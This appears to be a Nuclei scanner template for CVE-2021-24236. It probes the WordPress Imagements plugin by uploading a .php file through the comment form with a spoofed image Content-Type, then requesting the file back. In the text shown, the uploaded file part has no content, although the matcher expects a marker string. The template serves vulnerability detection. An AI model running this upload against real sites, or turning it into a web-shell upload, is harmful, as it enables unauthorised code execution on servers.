id: CVE-2021-24236 info: name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload author: pussycat0x severity: critical description: | The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE. reference: - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - https://wordpress.org/plugins/imagements/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24236 cwe-id: CWE-434 tags: cve,rce,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive variables: php: "{{to_lower('{{randstr}}')}}.php" post: "1" requests: - raw: - | POST /wp-comments-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="author" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="email" {{randstr}}@email.com ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="url" ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="checkbox" yes ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="naam" {{randstr}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="image"; filename="{{php}}" Content-Type: image/jpeg ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="submit" Post Comment ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_post_ID" {{post}} ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU Content-Disposition: form-data; name="comment_parent" 0 ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- - | GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: word part: body_2 words: - "CVE-2021-24236"